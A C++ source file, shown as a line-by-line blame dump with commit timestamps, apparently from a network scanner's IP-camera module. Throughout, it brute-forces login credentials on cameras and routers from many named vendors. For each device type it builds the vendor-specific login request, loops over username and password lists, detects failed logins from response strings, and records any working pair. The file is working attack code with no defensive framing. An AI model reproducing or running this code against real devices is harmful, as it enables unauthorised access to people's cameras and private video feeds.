2015-04-02 13:36:48 +00:00
|
|
|
#include "IPCAuth.h"
|
2015-04-02 17:27:10 +00:00
|
|
|
#include "Utils.h"
|
2015-04-02 13:36:48 +00:00
|
|
|
#include "BruteUtils.h"
|
|
|
|
|
#include "FileUpdater.h"
|
|
|
|
|
|
2016-05-02 23:11:20 +00:00
|
|
|
#include <iomanip>
|
|
|
|
|
#include <sstream>
|
|
|
|
|
std::string urlEncode(const string &value) {
|
|
|
|
|
ostringstream escaped;
|
|
|
|
|
escaped.fill('0');
|
|
|
|
|
escaped << hex;
|
|
|
|
|
|
|
|
|
|
for (string::const_iterator i = value.begin(), n = value.end(); i != n; ++i) {
|
|
|
|
|
string::value_type c = (*i);
|
|
|
|
|
|
|
|
|
|
// Keep alphanumeric and other accepted characters intact
|
|
|
|
|
if (isalnum(c) || c == '-' || c == '_' || c == '.' || c == '~') {
|
|
|
|
|
escaped << c;
|
|
|
|
|
continue;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
// Any other characters are percent-encoded
|
|
|
|
|
escaped << uppercase;
|
|
|
|
|
escaped << '%' << setw(2) << int((unsigned char)c);
|
|
|
|
|
escaped << nouppercase;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
return escaped.str();
|
|
|
|
|
}
|
|
|
|
|
|
2016-01-31 20:09:42 +00:00
|
|
|
lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie)
|
2015-04-02 13:36:48 +00:00
|
|
|
{
|
2015-04-04 12:43:22 +00:00
|
|
|
lopaStr lps = {"UNKNOWN", "", ""};
|
2016-02-28 16:07:10 +00:00
|
|
|
int result = 0;
|
2015-04-02 13:36:48 +00:00
|
|
|
char login[128] = {0};
|
|
|
|
|
char pass[128] = {0};
|
|
|
|
|
char request[1024] = {0};
|
|
|
|
|
int passCounter = 1;
|
2015-08-07 22:37:28 +00:00
|
|
|
int rowIndex = -1;
|
2015-04-02 13:36:48 +00:00
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
std::vector<char*> negVector;
|
|
|
|
|
std::vector<char*> slideVector;
|
2015-04-02 13:36:48 +00:00
|
|
|
if(strcmp(SPEC, "IPC") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("<UserGroup>Invalid</UserGroup>");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "GEO") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Access denied");
|
|
|
|
|
negVector.push_back("ErrNoSuchUsr.htm");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "EasyCam") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Set-Cookie: usrLevel=-1;path=/");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "Foscam") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("<result>0</result>");
|
|
|
|
|
negVector.push_back("<result>-1</result>");
|
|
|
|
|
negVector.push_back("<result>-2</result>");
|
|
|
|
|
negVector.push_back("<result>-3</result>");
|
|
|
|
|
negVector.push_back("<result>-4</result>");
|
|
|
|
|
negVector.push_back("<result>-5</result>");
|
|
|
|
|
negVector.push_back("<result>-6</result>");
|
|
|
|
|
negVector.push_back("<result>-7</result>");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "AVIOSYS") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Password Error");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "BUFFALO") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("403 Forbidden");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "DVS") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Non-Existed");
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "IPCAM") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("var check=\"0\"");
|
|
|
|
|
negVector.push_back("var authLevel =\"0\";");
|
2015-04-19 10:27:04 +00:00
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "IEORFOREFOX") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("AAA()");
|
|
|
|
|
negVector.push_back("РРјСЏ или пароль неверные!");
|
|
|
|
|
negVector.push_back("Возврат");
|
|
|
|
|
negVector.push_back("HTTP/1.0 302 Found");
|
|
|
|
|
negVector.push_back("is incorrect");
|
|
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "MASPRO") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("action=\"setup_login.cgi\"");
|
|
|
|
|
}
|
2015-04-23 05:23:02 +00:00
|
|
|
else if (strcmp(SPEC, "WEBCAMXP") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Not logged in");
|
|
|
|
|
}
|
2015-04-25 19:45:01 +00:00
|
|
|
else if (strcmp(SPEC, "JASSUN") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Log in failed");
|
|
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "BEWARD") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("/error.asp");
|
|
|
|
|
}
|
2015-08-30 14:40:00 +00:00
|
|
|
else if (strcmp(SPEC, "JUAN") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("errno=\"4\"");
|
|
|
|
|
}
|
2016-01-31 20:09:42 +00:00
|
|
|
else if (strcmp(SPEC, "ACTi") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("ERROR: ");
|
|
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "AirOS") == 0)
|
|
|
|
|
{
|
|
|
|
|
negVector.push_back("Invalid credentials");
|
|
|
|
|
}
|
2016-02-28 16:07:10 +00:00
|
|
|
else if (strcmp(SPEC, "XMSECU") == 0)
|
|
|
|
|
{
|
|
|
|
|
slideVector.push_back("errornumber=-1");
|
|
|
|
|
negVector.push_back("Log in failed");
|
|
|
|
|
}
|
2015-04-02 13:36:48 +00:00
|
|
|
else
|
|
|
|
|
{
|
|
|
|
|
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
|
|
|
|
|
return lps;
|
|
|
|
|
};
|
2015-04-25 19:45:01 +00:00
|
|
|
|
2015-04-04 07:24:31 +00:00
|
|
|
int res = 0;
|
|
|
|
|
for(int i = 0; i < MaxLogin; ++i)
|
2015-04-02 13:36:48 +00:00
|
|
|
{
|
|
|
|
|
if(!globalScanFlag) break;
|
2016-02-28 16:07:10 +00:00
|
|
|
FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
|
|
|
|
|
strcpy(login, loginLst[i]);
|
|
|
|
|
if(strcmp(login, " ") == 0) continue;
|
2015-04-02 13:36:48 +00:00
|
|
|
|
2015-04-04 07:24:31 +00:00
|
|
|
for(int j = 0; j < MaxPass; ++j)
|
2015-04-02 13:36:48 +00:00
|
|
|
{
|
|
|
|
|
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
|
|
|
|
|
if(!globalScanFlag) break;
|
|
|
|
|
if(strcmp(passLst[j], " ") == 0) continue;
|
2016-02-28 16:07:10 +00:00
|
|
|
result = 0;
|
2015-04-02 13:36:48 +00:00
|
|
|
|
|
|
|
|
strcpy(pass, passLst[j]);
|
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
ZeroMemory(request, sizeof(request));
|
2015-12-08 16:53:54 +00:00
|
|
|
request[0] = 0;
|
2015-04-02 13:36:48 +00:00
|
|
|
if(strcmp(SPEC, "IPC") == 0)
|
|
|
|
|
{
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/login.xml?user=%s&usr=%s&password=%s&pwd=%s",
|
|
|
|
|
ip, login, login, pass, pass);
|
2015-04-02 13:36:48 +00:00
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "GEO") == 0)
|
|
|
|
|
{
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/Login.cgi?username=%s&password=%s",
|
|
|
|
|
ip, login, pass);
|
2015-04-02 13:36:48 +00:00
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "EasyCam") == 0)
|
|
|
|
|
{
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/login.xml?user=%s&usr=%s&password=%s&pwd=%s",
|
|
|
|
|
ip, login, login, pass, pass);
|
2015-04-02 13:36:48 +00:00
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "Foscam") == 0)
|
|
|
|
|
{
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/cgi-bin/CGIProxy.fcgi?usr=%s&pwd=%s&cmd=logIn&usrName=%s&pwd=%s",
|
|
|
|
|
ip, login, pass, login, pass);
|
2015-04-02 13:36:48 +00:00
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "AVIOSYS") == 0)
|
|
|
|
|
{
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/check_user.html?UserName=%s&PassWord=%s",
|
|
|
|
|
ip, login, pass);
|
2015-04-02 13:36:48 +00:00
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "IPCAM") == 0)
|
|
|
|
|
{
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/cgi-bin/hi3510/checkuser.cgi?&-name=%s&-passwd=%s&-time=1416767330831",
|
|
|
|
|
ip, login, pass);
|
2015-04-02 13:36:48 +00:00
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "IEORFOREFOX") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/logincheck.rsp?type=1", ip);
|
2015-04-02 13:36:48 +00:00
|
|
|
sprintf(postData, "username=%s&userpwd=%s", login, pass);
|
|
|
|
|
}
|
|
|
|
|
else if(strcmp(SPEC, "BUFFALO") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/rpc/login", ip);
|
2015-04-02 13:36:48 +00:00
|
|
|
sprintf(postData, "user=%s&password=%s", login, pass);
|
2015-04-19 10:27:04 +00:00
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "DVS") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/login", ip);
|
2015-04-19 10:27:04 +00:00
|
|
|
sprintf(postData, "langs=en&user=%s&password=%s&submit=+Login+", login, pass);
|
|
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "MASPRO") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/setup_login.cgi", ip);
|
2015-04-19 10:27:04 +00:00
|
|
|
sprintf(postData, "check_username=%s&check_password=%s&login=", login, pass);
|
|
|
|
|
}
|
2015-04-23 05:23:02 +00:00
|
|
|
else if (strcmp(SPEC, "WEBCAMXP") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/login.html", ip);
|
2015-04-23 05:23:02 +00:00
|
|
|
sprintf(postData, "username=%s&password=%s&Redir=/", login, pass);
|
|
|
|
|
}
|
2015-04-25 19:45:01 +00:00
|
|
|
else if (strcmp(SPEC, "JASSUN") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/Login.htm", ip);
|
2015-04-25 19:45:01 +00:00
|
|
|
sprintf(postData, "command=login&username=%s&password=%s", login, pass);
|
|
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "BEWARD") == 0)
|
|
|
|
|
{
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/webs/httplogin?username=%s&password=%s&UserID=45637757",
|
|
|
|
|
ip, login, pass);
|
2015-04-25 19:45:01 +00:00
|
|
|
}
|
2015-08-30 14:40:00 +00:00
|
|
|
else if (strcmp(SPEC, "JUAN") == 0)
|
|
|
|
|
{
|
2017-04-01 21:58:51 +00:00
|
|
|
std::string encodedLogin = urlEncode(std::string(login));
|
|
|
|
|
std::string encodedPass = urlEncode(std::string(pass));
|
2016-01-31 20:09:42 +00:00
|
|
|
sprintf(request, "%s/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693",
|
2016-05-02 23:11:20 +00:00
|
|
|
ip, encodedLogin.c_str(), encodedPass.c_str());
|
2016-01-31 20:09:42 +00:00
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "ACTi") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
|
|
|
|
sprintf(request, "%s/cgi-bin/videoconfiguration.cgi", ip);
|
|
|
|
|
sprintf(postData, "LOGIN_ACCOUNT=%s&LOGIN_PASSWORD=%s", login, pass);
|
|
|
|
|
}
|
|
|
|
|
else if (strcmp(SPEC, "AirOS") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
|
|
|
|
sprintf(request, "%s/login.cgi", ip);
|
|
|
|
|
char tempPostData[1024] = { 0 };
|
|
|
|
|
int cl = 341 + strlen(login) + strlen(pass);
|
|
|
|
|
sprintf(tempPostData, "-----------------------------170381307613422\r\n\
|
|
|
|
|
Content-Disposition: form-data; name=\"uri\"\r\n\
|
|
|
|
|
\r\n\
|
|
|
|
|
/\r\n\
|
|
|
|
|
-----------------------------170381307613422\r\n\
|
|
|
|
|
Content-Disposition: form-data; name=\"username\"\r\n\
|
|
|
|
|
\r\n\
|
|
|
|
|
%s\r\n\
|
|
|
|
|
-----------------------------170381307613422\r\n\
|
|
|
|
|
Content-Disposition: form-data; name=\"password\"\r\n\
|
|
|
|
|
\r\n\
|
|
|
|
|
%s\r\n\
|
|
|
|
|
-----------------------------170381307613422--\
|
|
|
|
|
\r\n", login, pass);
|
|
|
|
|
|
|
|
|
|
sprintf(postData, "Content-Type: multipart/form-data; boundary=---------------------------170381307613422\r\n\
|
|
|
|
|
Content-Length: %d\r\n\r\n\
|
|
|
|
|
%s", cl, tempPostData);
|
|
|
|
|
}
|
2016-02-28 16:07:10 +00:00
|
|
|
else if (strcmp(SPEC, "XMSECU") == 0)
|
|
|
|
|
{
|
|
|
|
|
doPost = true;
|
|
|
|
|
sprintf(request, "%s/Login.htm", ip);
|
|
|
|
|
sprintf(postData, "command=login&username=%s&password=%s", login, pass);
|
|
|
|
|
}
|
2016-01-31 20:09:42 +00:00
|
|
|
|
|
|
|
|
std::string buffer;
|
|
|
|
|
if (cookie->size() > 0) {
|
|
|
|
|
std::vector<std::string> cookieHeader{ *cookie };
|
|
|
|
|
Connector con;
|
|
|
|
|
if (doPost) res = con.nConnect(request, port, &buffer, postData, &cookieHeader);
|
|
|
|
|
else res = con.nConnect(request, port, &buffer, NULL, &cookieHeader);
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
Connector con;
|
|
|
|
|
if (doPost) res = con.nConnect(request, port, &buffer, postData);
|
|
|
|
|
else res = con.nConnect(request, port, &buffer);
|
2015-08-30 14:40:00 +00:00
|
|
|
}
|
2015-04-02 13:36:48 +00:00
|
|
|
|
2015-08-07 22:37:28 +00:00
|
|
|
if (res == -2) {
|
2016-02-28 16:07:10 +00:00
|
|
|
rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
|
2015-08-07 22:37:28 +00:00
|
|
|
return lps;
|
|
|
|
|
}
|
2015-04-04 07:24:31 +00:00
|
|
|
else if (res != -1) {
|
2016-02-28 16:07:10 +00:00
|
|
|
for (int i = 0; i < slideVector.size(); ++i)
|
|
|
|
|
{
|
|
|
|
|
if (Utils::ustrstr(buffer, slideVector[i]) != -1)
|
|
|
|
|
{
|
|
|
|
|
result = -1;
|
|
|
|
|
break;
|
|
|
|
|
};
|
|
|
|
|
}
|
|
|
|
|
if (-1 == result) {
|
|
|
|
|
passCounter += MaxPass - 1;
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
|
2015-04-04 07:24:31 +00:00
|
|
|
for (int i = 0; i < negVector.size(); ++i)
|
|
|
|
|
{
|
2015-04-16 11:51:51 +00:00
|
|
|
if (Utils::ustrstr(buffer, negVector[i]) != -1)
|
2015-04-04 07:24:31 +00:00
|
|
|
{
|
2016-02-28 16:07:10 +00:00
|
|
|
result = 1;
|
2015-04-04 07:24:31 +00:00
|
|
|
break;
|
|
|
|
|
};
|
|
|
|
|
};
|
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
if (0 == result)
|
2015-04-04 07:24:31 +00:00
|
|
|
{
|
2016-02-28 16:07:10 +00:00
|
|
|
strcpy(lps.login, login);
|
|
|
|
|
strcpy(lps.pass, pass);
|
2015-08-07 22:37:28 +00:00
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
|
2015-08-07 22:37:28 +00:00
|
|
|
|
2015-04-04 07:24:31 +00:00
|
|
|
return lps;
|
2016-02-28 16:07:10 +00:00
|
|
|
}
|
2015-04-04 07:24:31 +00:00
|
|
|
}
|
2016-01-31 20:09:42 +00:00
|
|
|
else {
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
2016-02-28 16:07:10 +00:00
|
|
|
|
|
|
|
|
rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
|
2015-08-07 22:37:28 +00:00
|
|
|
++passCounter;
|
2015-04-02 13:36:48 +00:00
|
|
|
Sleep(100);
|
|
|
|
|
};
|
|
|
|
|
};
|
2016-02-28 16:07:10 +00:00
|
|
|
|
|
|
|
|
rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
|
2015-04-02 13:36:48 +00:00
|
|
|
return lps;
|
|
|
|
|
}
|
|
|
|
|
|
2016-01-31 20:09:42 +00:00
|
|
|
lopaStr IPC::IPCLobby(const char *ip, int port, char *SPEC, const std::string *cookie) {
|
2015-04-02 13:36:48 +00:00
|
|
|
if(gMaxBrutingThreads > 0) {
|
|
|
|
|
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
|
|
|
|
|
|
2015-04-04 12:43:22 +00:00
|
|
|
++baCount;
|
|
|
|
|
++BrutingThrds;
|
2016-01-24 19:03:28 +00:00
|
|
|
stt->doEmitionUpdateArc(gTargets);
|
2016-01-31 20:09:42 +00:00
|
|
|
lopaStr lps = IPCBrute(ip, port, SPEC, cookie);
|
2015-04-04 12:43:22 +00:00
|
|
|
--BrutingThrds;
|
2015-04-02 13:36:48 +00:00
|
|
|
|
|
|
|
|
return lps;
|
|
|
|
|
} else {
|
2015-04-04 12:43:22 +00:00
|
|
|
lopaStr lps = {"UNKNOWN", "", ""};
|
2015-04-02 13:36:48 +00:00
|
|
|
return lps;
|
|
|
|
|
}
|
|
|
|
|
}
|
